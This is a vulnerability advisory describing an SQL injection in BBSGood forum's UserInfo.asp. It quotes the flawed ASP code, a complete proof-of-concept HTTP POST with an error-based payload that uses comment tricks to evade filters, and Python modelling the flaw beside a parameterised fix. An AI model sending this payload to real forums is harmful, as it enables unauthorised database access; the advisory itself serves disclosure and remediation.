SQL injection vulnerability in the UserInfo.asp page of the BBSGood forum software


Date added:
2010-06-13

System ID:
WAVDB-01652

Affected versions:
BBSGood 5.0/5.0.2

Program description:

BBSGOOD is the first forum package in China to use caching technology; BBSGOOD can render its post pages and list/index pages as static HTML files.

Vulnerability analysis:

In the file UserInfo.asp:
case 6   ' line 1289
    dim selectid
    selectid=trim(RequestCStringSafe(Request.Form("selectid")))
    if selectid="" then
        Response.Write "<br><br><center><li>The selection cannot be empty!</li></center><br><br><br><br>"
    else
        if instr(1,selectid,", ")>0 then
            selectid = Replace(selectid, ", "," or id=")
        end if
        selectid="id="&selectid
        conn.execute("update lxtel_topic set myfiles=0 where "&selectid&"")
selectid is meant to carry a topic id (or several ids separated by ", "), but the only sanitisation it receives is the string filter RequestCStringSafe. It is never checked to be numeric, and it is then spliced directly into the WHERE clause of the UPDATE statement, so anything the filter lets through becomes part of the executed SQL. That missing numeric check is the injection flaw.


Exploitation:

POST /userinfo.asp?cz=8&mypost=6 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/QVOD, */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0; .NET CLR 2.0.50727)
Host: localhost
Content-Length: 80
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSADTQSBB=MJJBPFMBPGGMJLFJOIHAOOAB; BBSGood%2ESpeedadmin=0; BBSGood%2ESpeedpassword=98513a2197288d8a; BBSGood%2ESpeedusername=lovemmm; d3ef3_lastpos=index; d3ef3_ol_offset=97; 1059d_lastpos=other; 1059d_ol_offset=97; 1059d_winduser=BWpXVlRWCAcDBgQFAQIGDV0BUlsGUgUHAABVVVYABQdRDDA%3D; 1059d_ck_info=%2F%09; 1059d_lastvisit=7212%091225703227%09%2Fu.php%3Faction%3Dtopic%26username%3Dlovemmm%25efdd%2527%2520or%2520m.username%3D%27lovemmm; 1059d_threadlog=%2C4%2C; 1059d_ipfrom=f528764d624db129b32c21fbca0cb8d6%09%B1%BE%BB%FA%B5%D8%D6%B7%0D; 1059d_readlog=%2C1%2C
 
selectid=1%2F**%2Fand%2F**%2Fuser%2F**%2Fin%2F**%2F%280%29--&Submit=%CC%E1%BD%BB

URL-decoded, the selectid value is `1/**/and/**/user/**/in/**/(0)--`, which the code above turns into `update lxtel_topic set myfiles=0 where id=1/**/and/**/user/**/in/**/(0)--`. The inline comments take the place of spaces (a common way past filters that key on whitespace), `user in (0)` makes SQL Server try to convert the current database user name to an integer, so if database errors are displayed the conversion error echoes that name back in the page (classic error-based injection), and `--` comments out the remainder of the statement. The request is the one recorded by the reporter; the `mypost=6` parameter selects the `case 6` branch shown in the analysis.
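As an added example (not BBSGood's code, and not part of the original advisory), the following Python models the string-building from the case 6 branch so the statement produced by the PoC body can be seen, and places a strict replacement beside it. RequestCStringSafe is not reproduced: the model assumes it passes the PoC payload through unchanged, which is what the recorded request demonstrates. The table name lxtel_topic and the PoC body are taken from the advisory; the function names are the example's own.

```python
# Added example, not BBSGood's code: model of the UserInfo.asp case 6 logic
# and a hardened replacement.  Assumes RequestCStringSafe leaves the PoC
# payload unchanged, as the advisory's request shows.
import re
from urllib.parse import parse_qs

TABLE = "lxtel_topic"  # table name from the advisory's snippet


def vulnerable_statement(selectid: str) -> str:
    """Mirror of the ASP logic: trim, rewrite ', ' as ' or id=', prefix
    'id=' and concatenate straight into the UPDATE statement."""
    selectid = selectid.strip()
    if ", " in selectid:
        selectid = selectid.replace(", ", " or id=")
    return f"update {TABLE} set myfiles=0 where id={selectid}"


# Only digits and comma separators are allowed; anything else is rejected.
_ID_LIST = re.compile(r"^\d+(?:\s*,\s*\d+)*$")


def safe_statement(selectid: str):
    """Hardened builder: validate selectid as a list of integers and return a
    parameterised statement with the ids as bound values (the database driver
    fills the '?' markers, so no user-supplied text reaches the SQL)."""
    selectid = selectid.strip()
    if not _ID_LIST.match(selectid):
        raise ValueError("selectid must be a comma-separated list of integers")
    ids = [int(part) for part in selectid.split(",")]
    placeholders = ",".join("?" for _ in ids)
    return f"update {TABLE} set myfiles=0 where id in ({placeholders})", ids


def accepts(selectid: str) -> bool:
    """True if the hardened builder would run a statement for this input."""
    try:
        safe_statement(selectid)
        return True
    except ValueError:
        return False


def selectid_from_body(body: str) -> str:
    """Extract the selectid field from an x-www-form-urlencoded POST body."""
    return parse_qs(body, keep_blank_values=True).get("selectid", [""])[0]


# The PoC body from the advisory (the Submit value is the GBK-encoded button label).
POC_BODY = "selectid=1%2F**%2Fand%2F**%2Fuser%2F**%2Fin%2F**%2F%280%29--&Submit=%CC%E1%BD%BB"

if __name__ == "__main__":
    payload = selectid_from_body(POC_BODY)
    print("decoded selectid  :", payload)
    print("benign, vulnerable:", vulnerable_statement("12, 15"))
    print("PoC, vulnerable   :", vulnerable_statement(payload))
    print("benign, hardened  :", safe_statement("12, 15"))
    print("PoC, hardened     : rejected =", not accepts(payload))
```

The hardened builder deliberately refuses rather than "cleans": for a field that must be a list of integers, a whitelist regex plus integer conversion leaves nothing for `/**/` or `--` to slip past, and binding the ids as parameters means the database never parses user text as SQL.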


Solution:
Vendor patch:
BBSGood.Speed
-------
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's homepage for the latest version:
http://www.bbsgood.com/

Until a fix is available, the code should reject any selectid that is not a comma-separated list of integers before it reaches conn.execute, or bind the ids as query parameters instead of concatenating them into the statement.

Source:
<*Source: Bug.Center.Team
Link: http://wavdb.com/vuln/1664
*>